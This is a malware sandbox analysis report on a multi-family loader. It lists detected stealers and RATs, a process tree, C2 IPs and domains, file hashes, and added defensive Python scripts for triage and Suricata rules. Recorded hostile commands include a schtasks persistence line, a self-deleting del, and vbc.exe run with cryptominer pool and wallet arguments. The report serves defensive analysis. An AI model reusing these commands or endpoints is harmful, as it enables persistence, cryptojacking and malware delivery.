Analysis Overview
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
Threat Level: Known bad
The file 4363463463464363463463463.bin was found to be: Known bad.
Malicious Activity Summary
Detect ZGRat V1
RedLine
Amadey
SmokeLoader
MetaSploit
Suspicious use of NtCreateUserProcessOtherParentProcess
RedLine payload
Detect Xworm Payload
Xworm
Rhadamanthys
Detect Vidar Stealer
Vidar
ZGRat
Detects executables packed with unregistered version of .NET Reactor
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Detects executables packed with Themida
Detects Windows executables referencing non-Windows User-Agents
Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion
Downloads MZ/PE file
Blocklisted process makes network request
.NET Reactor protector
Themida packer
Executes dropped EXE
Checks BIOS information in registry
Loads dropped DLL
Uses the VBS compiler for execution
Checks computer location settings
Adds Run key to start application
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Windows directory
Program crash
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-10 18:51
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-10 18:51
Reported
2024-02-10 18:54
Platform
win7-20231129-en
Max time kernel
7s
Max time network
149s
Command Line
Signatures
Amadey
Detect Vidar Stealer
Detect ZGRat V1
MetaSploit
SmokeLoader
Vidar
ZGRat
Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion
Detects executables packed with unregistered version of .NET Reactor
Downloads MZ/PE file
.NET Reactor protector
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\native.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\plink.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
Uses the VBS compiler for execution
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Files\32.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Files\build2.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Files\native.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\Files\32.exe
"C:\Users\Admin\AppData\Local\Temp\Files\32.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 64
C:\Users\Admin\AppData\Local\Temp\Files\native.exe
"C:\Users\Admin\AppData\Local\Temp\Files\native.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
C:\Users\Admin\AppData\Local\Temp\Files\plink.exe
"C:\Users\Admin\AppData\Local\Temp\Files\plink.exe"
C:\Users\Admin\AppData\Local\Temp\Files\build2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\build2.exe"
C:\Users\Admin\AppData\Local\Temp\Files\build2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\build2.exe"
C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe"
C:\Users\Admin\AppData\Local\Temp\Files\r.exe
"C:\Users\Admin\AppData\Local\Temp\Files\r.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp780D.tmp.bat""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2808 -s 1380
C:\Users\Admin\AppData\Local\Temp\Files\RobluxCoins.exe
"C:\Users\Admin\AppData\Local\Temp\Files\RobluxCoins.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
C:\Windows\system32\WerFault.exe
WerFault
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe
"C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe"
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
C:\Users\Admin\AppData\Local\Temp\is-RV3JG.tmp\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RV3JG.tmp\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.tmp" /SL5="$301E0,1495449,832512,C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe"
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
"C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"
C:\Users\Admin\AppData\Local\Temp\Files\bin.exe
"C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
C:\Users\Admin\AppData\Local\Temp\Files\bin.exe
"C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"
C:\Users\Admin\AppData\Local\Temp\Files\e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe"
C:\Users\Admin\AppData\Local\Temp\Files\e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe"
C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe
"C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Winlock.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Winlock.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x308
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
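The process tree above is the most actionable part of the report: a scheduled task that re-runs a payload from C:\ProgramData every three minutes with /RL HIGHEST, a timeout.exe sleep, a self-deleting cmd /c del, a batch file staged in %TEMP%, and the .NET VB compiler started with XMRig-style pool arguments instead of a source file. The following script is an added example, not part of the sandbox report and not the sandbox's own signature logic. It runs a handful of hand-written rules over the command lines copied from the Processes section (the mining wallet argument is shortened to the placeholder `<wallet>`); the rule names and thresholds are this example's assumptions.

```python
"""Rule-based triage of the command lines recorded in the behavioral1 run.

Added example, not part of the sandbox report and not the sandbox's own
signature logic. The command lines are copied from the report's Processes
section (the mining wallet is shortened to the placeholder <wallet>); the
rules, names and thresholds are this example's own heuristics.
"""
import re

# Constructed sample: command lines as they appear in the report.
COMMAND_LINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\Files\32.exe"',
    r'C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 64',
    r'timeout 3',
    r'cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp780D.tmp.bat""',
    r'"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 '
    r'/RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"',
    r'schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" '
    r'/tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"',
    r'/c del "C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"',
    r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o '
    r'fr-zephyr.miningocean.org:5342 -u <wallet> -p work -a rx/0 --donate-level 1 --opencl',
]

# Directories a scheduled task's action is expected to live in (assumption).
TRUSTED_DIRS = ('c:\\windows\\', 'c:\\program files')


def task_details(cmdline):
    """Parse a `schtasks /create` line into (interval_minutes, elevated, target).

    Returns None when the line is not a task creation. interval_minutes is
    None for non-MINUTE schedules; a bare /sc MINUTE without /mo counts as 1.
    """
    low = cmdline.lower()
    if not re.search(r'\bschtasks(?:\.exe)?\s+/create\b', low):
        return None
    sched = re.search(r'/sc\s+minute(?:\s+/mo\s+(\d+))?', low)
    interval = None if not sched else int(sched.group(1) or 1)
    elevated = '/rl highest' in low
    tr = (re.search(r'/tr\s+"([^"]+)"', cmdline, re.I)
          or re.search(r'/tr\s+(\S+)', cmdline, re.I))
    return interval, elevated, (tr.group(1) if tr else '')


def triage(cmdline):
    """Return the names of the rules the command line matches (empty if none)."""
    hits = []
    low = cmdline.lower()
    first = re.match(r'"?([^"\s]+)', cmdline)
    image = first.group(1).lower().rsplit('\\', 1)[-1] if first else ''

    task = task_details(cmdline)
    if task:
        interval, elevated, target = task
        untrusted = not target.lower().startswith(TRUSTED_DIRS)
        if interval is not None and interval <= 5 and untrusted:
            hits.append('persistence: high-frequency task running a user-writable path')
        if elevated and untrusted:
            hits.append('persistence: task created with /RL HIGHEST')
    # Sleep loops that outlast short sandbox runs (timeout.exe, ping -n).
    if (re.match(r'(?:.*\\)?timeout(?:\.exe)?\s+(?:/t\s+)?\d+', low)
            or re.match(r'(?:.*\\)?ping(?:\.exe)?\s.*-n\s+\d+', low)):
        hits.append('evasion: execution delay')
    # cmd /c del <dropped exe>: the dropper removing its own artefacts.
    if re.search(r'\bdel\s+"?[^"]*\.exe"?', low):
        hits.append('defense evasion: deletes a dropped executable')
    # Batch file staged in %TEMP% and executed through cmd.exe.
    if re.search(r'\\temp\\[^"\s]*\.bat\b', low):
        hits.append('execution: batch script from %TEMP%')
    # Windows Error Reporting invoked for a crashed process (informational).
    if image == 'werfault.exe' and re.search(r'-p\s+\d+', low):
        hits.append('info: crash handled by WerFault')
    # The genuine .NET compiler started with no source file: it is being used
    # as a host process (the report's "Uses the VBS compiler" signature).
    if image in ('vbc.exe', 'csc.exe') and not re.search(r'\.vb\b|\.cs\b|/out:|/target:', low):
        hits.append('masquerading: .NET compiler launched without compiler arguments')
    # Pool URL, wallet and algorithm switches as used by XMRig-style miners.
    if (re.search(r'\s-o\s+\S+:\d+\b', low) and re.search(r'\s-u\s+\S+', low)
            and re.search(r'-a\s+(?:rx|cn|kawpow)|--donate-level', low)):
        hits.append('impact: cryptominer pool arguments')
    return hits


def triage_all(cmdlines):
    """Map each command line to its rule hits, keeping only lines that matched."""
    return {cmd: triage(cmd) for cmd in cmdlines if triage(cmd)}


if __name__ == '__main__':
    for cmd, rules in triage_all(COMMAND_LINES).items():
        print(cmd[:72])
        for rule in rules:
            print('    ', rule)
```

The two scheduled-task rules deliberately key on the combination (short interval, HIGHEST run level, action path outside Windows and Program Files) rather than on schtasks.exe alone, because legitimate software creates tasks constantly; the compiler rule fires on vbc.exe without any source or /out: argument, which is what distinguishes this run's vbc.exe from a real build.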
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| NL | 193.176.31.152:81 | 193.176.31.152 | tcp |
| US | 8.8.8.8:53 | mistitis.ug | udp |
| RU | 91.215.85.223:80 | mistitis.ug | tcp |
| GB | 5.148.32.222:6789 | 5.148.32.222 | tcp |
| DE | 185.172.128.154:80 | 185.172.128.154 | tcp |
| US | 8.8.8.8:53 | brusuax.com | udp |
| ET | 196.188.169.138:80 | brusuax.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:80 | github.com | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| RU | 178.159.36.155:80 | 178.159.36.155 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| DE | 185.172.128.32:80 | 185.172.128.32 | tcp |
| US | 8.8.8.8:53 | marksidfgs.ug | udp |
| RU | 91.215.85.223:80 | marksidfgs.ug | tcp |
| FI | 95.217.243.137:80 | 95.217.243.137 | tcp |
| FI | 95.217.243.137:80 | 95.217.243.137 | tcp |
| FI | 95.217.243.137:80 | 95.217.243.137 | tcp |
| US | 8.8.8.8:53 | vmi1159541.contaboserver.net | udp |
| US | 209.145.51.44:80 | vmi1159541.contaboserver.net | tcp |
| US | 8.8.8.8:53 | static.cz01.cn | udp |
| GB | 163.171.144.40:80 | static.cz01.cn | tcp |
| VN | 103.68.85.20:80 | 103.68.85.20 | tcp |
| US | 8.8.8.8:53 | scientific.pk | udp |
| RU | 91.215.85.223:80 | scientific.pk | tcp |
| CN | 47.99.151.68:1302 | | tcp |
| CN | 47.98.224.91:80 | | tcp |
| CN | 106.55.199.146:8088 | | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | ji.alie3ksggg.com | udp |
| HK | 154.92.15.189:80 | ji.alie3ksggg.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.180.1:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | i.alie3ksgaa.com | udp |
| HK | 154.92.15.189:443 | i.alie3ksgaa.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | www.hseda.com | udp |
| CN | 211.149.230.178:80 | www.hseda.com | tcp |
| US | 8.8.8.8:53 | host-file-host6.com | udp |
| US | 172.67.172.189:80 | host-file-host6.com | tcp |
| US | 8.8.8.8:53 | host-host-file8.com | udp |
| RU | 185.12.126.182:80 | host-host-file8.com | tcp |
| DE | 185.172.128.11:80 | 185.172.128.11 | tcp |
| US | 8.8.8.8:53 | app.alie3ksgaa.com | udp |
| HK | 154.92.15.189:80 | app.alie3ksgaa.com | tcp |
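The Network table mixes three kinds of traffic: DNS lookups to 8.8.8.8, contacts with shared infrastructure (the sandbox's own URLhaus lookup, certificate services such as pki.goog and apps.identrust.com, and the public platforms the report lists under "Legitimate hosting services abused"), and the direct-to-IP and throwaway-domain connections that are the actual C2 candidates. The script below is an added example, not part of the report: it parses a subset of the rows copied from the table in the page's own pipe format (including one row whose protocol landed in the domain column, as on the page), separates shared infrastructure from candidate C2, and renders the latter as Suricata alert rules. The allowlist of shared hosts is this example's assumption; t.me and steamcommunity.com are added to it on the same reasoning the report applies to drive.google.com and raw.githubusercontent.com.

```python
"""Extract candidate C2 endpoints from the report's Network table.

Added example, not part of the sandbox report. The rows are a subset copied
from the report in its own pipe-table format; the allowlist of shared
infrastructure is this example's assumption and should be reviewed before
anything is blocked on the strength of it.
"""
import ipaddress

# Constructed sample: rows copied from the report (one deliberately misaligned).
NETWORK_TABLE = """
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| NL | 193.176.31.152:81 | 193.176.31.152 | tcp |
| US | 8.8.8.8:53 | mistitis.ug | udp |
| RU | 91.215.85.223:80 | mistitis.ug | tcp |
| GB | 5.148.32.222:6789 | 5.148.32.222 | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| RU | 91.215.85.223:80 | marksidfgs.ug | tcp |
| RU | 91.215.85.223:80 | scientific.pk | tcp |
| CN | 47.99.151.68:1302 | tcp | |
| US | 216.239.32.29:80 | pki.goog | tcp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
"""

# Shared services the sample touched (assumption of this example): the
# sandbox's reputation lookup, certificate/CRL endpoints, and public hosting
# or messaging platforms. Their IPs are not attacker-controlled, so they are
# reported separately rather than as C2.
SHARED_INFRA = {
    'urlhaus.abuse.ch', 'www.microsoft.com', 'pki.goog', 'apps.identrust.com',
    'github.com', 'raw.githubusercontent.com', 'objects.githubusercontent.com',
    'drive.google.com', 'drive.usercontent.google.com', 't.me',
    'steamcommunity.com',
}


def parse_rows(table):
    """Yield (ip, port, domain, proto) for each data row of the pipe table."""
    for line in table.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip('|').split('|')]
        if len(cells) != 4 or cells[0] == 'Country':
            continue
        _country, dest, domain, proto = cells
        if domain in ('tcp', 'udp') and not proto:   # protocol slipped into the domain column
            domain, proto = '', domain
        ip, _, port = dest.rpartition(':')
        yield ip, int(port), domain, proto.lower()


def classify(table):
    """Split contacts into (candidate_c2, shared_infra), each mapping
    (ip, port) -> sorted domains that resolved to it. Resolver queries and
    non-global addresses are dropped; a domain equal to the IP is not a name."""
    c2, shared = {}, {}
    for ip, port, domain, proto in parse_rows(table):
        if proto == 'udp' and port == 53:
            continue
        if not ipaddress.ip_address(ip).is_global:
            continue
        bucket = shared if domain in SHARED_INFRA else c2
        names = bucket.setdefault((ip, port), set())
        if domain and domain != ip:
            names.add(domain)
    return ({k: sorted(v) for k, v in c2.items()},
            {k: sorted(v) for k, v in shared.items()})


def suricata_rules(endpoints, sid_base=9000000):
    """Render one Suricata/Snort alert rule per candidate endpoint."""
    rules = []
    for i, ((ip, port), domains) in enumerate(sorted(endpoints.items())):
        label = ' '.join([ip] + domains)
        rules.append(f'alert tcp $HOME_NET any -> {ip} {port} '
                     f'(msg:"Sandbox-observed C2 contact {label}"; sid:{sid_base + i}; rev:1;)')
    return rules


if __name__ == '__main__':
    c2, shared = classify(NETWORK_TABLE)
    for rule in suricata_rules(c2):
        print(rule)
    print('shared infrastructure, not blocked:', sorted(shared))
```

One thing the grouping makes visible that the flat table does not: 91.215.85.223:80 is reached under three different throwaway domains (mistitis.ug, marksidfgs.ug, scientific.pk), so an IP-and-port rule covers it where a domain blocklist would need three entries and would miss the next one.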
Files
memory/1716-0-0x0000000000B40000-0x0000000000B48000-memory.dmp
memory/1716-1-0x0000000074B40000-0x000000007522E000-memory.dmp
memory/1716-2-0x0000000004B40000-0x0000000004B80000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar2918.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | b57ca78cb9df252ed98b88b2228d3617 |
| SHA1 | bc9e02b214bac1a884b2d875c95a4b3ce962ced1 |
| SHA256 | 2c4012ea929bc2fa44efbec208d3fc3c2aef8fea79e0982f3a83a188adeee10e |
| SHA512 | ecc18487c015bbfe162bc0cefcf30dff778dae8690323e6df018556dad123390990b1226374043957c84ea28010c3e613f7688b895897feac9bf497ba3ef7c37 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
\Users\Admin\AppData\Local\Temp\Files\32.exe
| MD5 | fb003fc48dbad9290735c9a6601381f7 |
| SHA1 | 49086b4036de3d990d0120697553f686091b2cd9 |
| SHA256 | 9b7110edf32f235d590b8141ba6aa81eb3414e3202ff0feefcb2160e655c0116 |
| SHA512 | 690877ca9798f1b6bbf67199fa55d939428b87888d99e2f730cad4b1aa0d37938622ce265a19fac2e0778237bf6fe1bc0cb773d5f7be5219800ad4a3d850604b |
\Users\Admin\AppData\Local\Temp\Files\native.exe
| MD5 | 1a917a85dcbb1d3df5f4dd02e3a62873 |
| SHA1 | 567f528fec8e7a4787f8c253446d8f1b620dc9d6 |
| SHA256 | 217fbf967c95d1359314fcd53ae8d04489eb3c7bdc1f22110d5a8a476d1fc92e |
| SHA512 | 341acbd43efac1718c7f3e3795549acf29237a2675bdadcb7e52ce18aac6dcc6ae628e1b6edfa2338ed6d9923c148cb4322c75fad86d5c0e6f2327c2270563ec |
C:\Users\Admin\AppData\Local\Temp\Files\native.exe
| MD5 | 853263c99d2209de04dc14a54da89fc6 |
| SHA1 | c859c7ec0cdc5b06a49b83396d157c4dae3d6af3 |
| SHA256 | 1726fedeb53ef2333784eae9153f7a9cd3d42ee92c6c5fc0f478963f4ff6d8cd |
| SHA512 | 8786a0f0aae19e2e972a21f3e1b17c58006bbb64c8e8cc8dd6e541bf2f53b77d668b0a242ffc0912169c441ac2023d99b101f6a321991368b83d9ba3073c0ff3 |
memory/1136-89-0x0000000074B40000-0x000000007522E000-memory.dmp
memory/1136-88-0x0000000001030000-0x0000000001258000-memory.dmp
memory/1136-90-0x0000000004C00000-0x0000000004E08000-memory.dmp
memory/1136-91-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-94-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-100-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-102-0x0000000004C00000-0x0000000004E03000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\plink.exe
| MD5 | 7e559dc4e162f6aaee6a034fa2d9c838 |
| SHA1 | 43c3e4563c3c40884d7ff7d0d99c646943a1a9fd |
| SHA256 | 4c2e05acad9e625ba60ca90fa7cce6a1b11a147e00f43e0f29225faeff6b54aa |
| SHA512 | 160ca1d23ae3f7e8369ce4706bd1665e4f48ee4fc2eb8b4429437decfa20f618fdbe47b4d290e3b320ca1a826e4f7002b78667d00a13dba5a169ecb06ef50749 |
memory/1136-112-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-117-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-119-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-115-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-121-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-123-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-125-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/2716-127-0x0000000000230000-0x0000000000231000-memory.dmp
memory/2716-129-0x0000000000230000-0x0000000000231000-memory.dmp
memory/1136-135-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-139-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-143-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-147-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-149-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-145-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-151-0x0000000004C00000-0x0000000004E03000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
| MD5 | 90a7bc4a429e25ba88d41eee8061e69e |
| SHA1 | a270e6867863a52b314bb6eb004f8dc49cb3e70b |
| SHA256 | a0606a6e530ddcef7cd63bf01c7f28c314b38240460456ca6c34ce9bc44c7763 |
| SHA512 | d906f310a32ba6019b5d425455e7b6875475da5ce0a9e61469e62b4532cc94abb58696432b832831fd2347211034f0d78dab871d7af658054f62f5d6625da0b2 |
memory/1136-168-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-166-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-170-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-172-0x0000000004C00000-0x0000000004E03000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
| MD5 | 90382e2dd2ab757bf72666538bb988fb |
| SHA1 | 0237680ac12030e7b40a51d3b9b3351ab0d88f6e |
| SHA256 | 6156756a8527c4e51f6a02a1f39f72fa2857e241004d8ba05d0658832456b34a |
